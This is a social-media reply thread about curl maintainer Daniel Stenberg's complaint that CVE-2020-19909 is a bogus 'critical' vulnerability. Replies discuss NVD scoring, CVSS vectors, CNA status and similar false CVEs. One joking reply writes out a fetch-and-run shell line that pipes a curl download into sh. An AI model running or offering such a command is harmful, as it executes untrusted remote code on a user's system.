"CVE-2020-19909 is everything that is wrong with CVEs"

A claimed "9.8 CRITICAL" flaw in #curl that does not exist.

https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/


We have enough problems with NVD inflating our *real* issues, doing the same thing with imaginary issues is so next level.

IT HURTS DEEP IN MY SOUL.

@bagder maybe the severity of this issue is so negative that it causes NVD to run into an integer overflow of their own? 😂
@bagder
well, guess whose Wikipedia article now includes this erroneous reporting by them, including some juicy quotes in-paragraph?
(hope this at least makes you feel slightly better)
@bagder I wonder what would happen, if you CVSS'd a typo as 10.0 in some README file as remotely exploitable and gave it an imaginary CVE-2040-404, just to mess with people …? Best published the day after a March 31st …

@bagder centralized convenience service always enshittify. Sadly.
@bagder or: the security industry writes themselves some minivans.
@bagder can you see any path forward where maintainers who want to could have a bigger role in maintaining their CVE list? Has NIST or would NIST consider such a thing, or would we need a whole new platform? Is there already a better alternative we could start preferring?
@dbanty I'm not that familiar with all the processes and details to tell. People tend to tell me "you should become your own CNA" as if that makes things better, but I have no idea. And it also seems like a complicated way, as surely not everyone can be CNAs. This system clearly needs fixing though.
@bagder @dbanty Hey Daniel, I've run a CNA before (for Puppet) and I would be happy to have a chat about the pros and cons and how it may help you with some of these

@bagder I saw "CVE-2020-*" in the title, and thought you were simply bringing up an old post... then I noticed the 2023 in the URL and ???

...the fuck, too

@bagder be grateful they didn’t rate it a 9.9 😉 ever wondered what kind of “security incident” would warrant a solid 10.0 for curl? 😄
@maxbob @bagder Naturally we're using the Spinal Tap scale for severity, so a *buffer* overflow would rate 11/10.
@maxbob @bagder If you point curl at a URL with malicious code, you can download malicious code

@phi1997 @maxbob @bagder but that would still require user intervention, running curl that is, which afaik would not qualify for a 10

(and - as my brain is still a bit slower than my fingers, I noticed the cynicism in your reply)

@maxbob @bagder curl 10.0 CVE: an attacker can execute arbitrary code from a remote source by running sh -c "$(curl -fsSL https://haxx.info)" on the victim's computer!!! /j

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

Applications that link libcurl and use it to process URLs and handle responses could maybe be higher in this hypothetical scenario, but that wouldn't be down to curl itself.

@bagder

Seems like legal action might be in order.

@bagder I've called out a few bogus CVEs like this. There was one where after it was closed and rejected, it was filed AGAIN when the version bumped on GitHub. Article:
https://hackaday.com/2023/07/07/this-week-in-security-bogus-cves-bogus-pocs-and-maybe-a-bogus-breach/

@bagder that cvss vector makes no sense either. No wonder they came up with that score.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

@drizzy @bagder I enjoy UI:N for a command-line tool where the bug (not vulnerability) is a specific flag you have to use.

This seems maliciously done by whomever reported it as a security issue in the first place IMO. NVD is a bit of a silly middleman pushing papers but I have no idea how TF they came up with that scoring.

@bagder Reminds me of when I looked into a high severity code execution vulnerability in Notepad++ (with its own CVE of course) for a university course assignment, which allegedly worked by simply opening a maliciously crafted file. The “high severity exploit” was simply generating an exception in a C++ std function and crashing. The vulnerability did not exist and I’m still mad about the time I wasted on it. 🥲
@bagder there was something similar with the H2 DB system within the last few weeks, CVE-2022-45868.
Similar thing with it not actually being an issue, the project not being informed until someone asked them about it.
@4censord @bagder PostgreSQL's CVE-2019-9193 is another fun one. The security team explained to the reporter that it was by design, but they still went ahead and filed for a CVE!

@ilmari @4censord @bagder
and there was also the classic CVE-2023-24068/9 in @signalapp 's Desktop client that required the exploiter to already have full access to the machine, at which point they can just straight up open the client...

https://mastodon.world/@Mer__edith/109751701529562752

Meredith Whittaker (@Mer__edith@mastodon.world):

The report by johnjhacking is confused. What they propose requires a level of access that's only available if the device is already completely compromised: “First and foremost, you need access to the device.” TLDR someone compromising your device is not a problem with Signal. Yes, someone with that level of access to your device can do just about anything you can, like open Signal Desktop, look at your photos, review your browser history, etc.

@bagder wait…. So it’s just a bug? If it overflows it just executes, that’s all? Could an attacker do anything with that?
@monpop @bagder Is control of the command line in the threat model? I would be surprised if it is, I guess. Then the attacker has your machine already.
@bagder sounds like Chatbots are now reporting CVEs -.-
@bagder As a way of saying how old I am without saying how old I am. Mitre used to have a mechanism that potential issues were assigned a CAN-number. Then the elite would vote if it was indeed a vulnerability. If so, a CAN would become a CVE. Of course this soon became a mess as the CANs piled up and checking if a CAN ended up as CVE just for reference became a dreadful chore. I guess you’re on the accepted risk end of the choice made to end the CAN/CVE naming and stick with CVE.
@bagder I can recommend becoming a CNA (https://www.cve.org/ResourcesSupport/Glossary?activeTerm=glossaryCNA); not much work and you get all CVEs reported and you need to assign them. There is an escalation process though in case the reporter disagrees with your assessment. We became a CNA this year and I enjoy it!

@Shortfinga in a case like this, how would being a CNA have changed things? Does it prohibit other CNAs to submit CVEs for your products?
@bagder @Shortfinga Yes, it does. Only Mitre could then decide to allocate a CVE after hearing all parties.
@rgacogne @Shortfinga Thanks. It seems going full CNA is the best way for us to control this madness.
@bagder @rgacogne @Shortfinga The PHP project is one too. I've done it for one and although not easy, it isn't terrible either.
@bagder I've noticed a small error in the time conversions in your post: "two million seconds (roughly 68 years)" - this should be either 2 billion seconds or ~23 days.
EDIT: fixed now, thanks.
@bagder Also, this totally ruins my plan of building a space probe running curl 7.65.2 on Windows that would communicate over http with a server in another galaxy.
@p4 it struck me as well. Thanks, will correct soon!
@bagder looking at the scoring, someone had a field day here
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1
Vector: network? I would think local
User interaction none? Who puts on the delay value?
And impact metrics all high? When setting a wait time that would wrap around, I would say this increases availability 🤭

@bagder Hope it gets rejected ASAP + Keep up the awesome work (and keep fixing the mistakes that can and will happen).

@bagder #pytest seems to have had another similar abuse, recently, of the #CVE system that caused a great deal of churn for their project:

https://github.com/pytest-dev/py/issues/287

I guess there are some new folks to the 'security' field who look to score points by filing vulnerability reports without considering the consequences, or impact.

@bagder makes me think: if anyone besides the project owner can file a CVE, why has nobody filed one for the recent Microsoft cloud failure? Everyone was complaining about Microsoft not creating a CVE because it was cloud. But nobody created one on their behalf?

@bagder this is crazy (as is the NVD post you linked).

In theory, the compiler could change the integer overflow to code that deletes all files, instead of truncating, though, so it is a problem. Just not as crass as that, and most software is affected by that problem class because C is stupid.

@bagder NVD should be handed over to more open/non-profit orgs like internetsociety.org under which is IETF, instead of US govt 
@bagder Hm, given that this is a popular/newsworthy story I’m guessing that malicious CVEs probably aren’t a very common problem. He seems to be contesting it. Glad to see that the system is working well.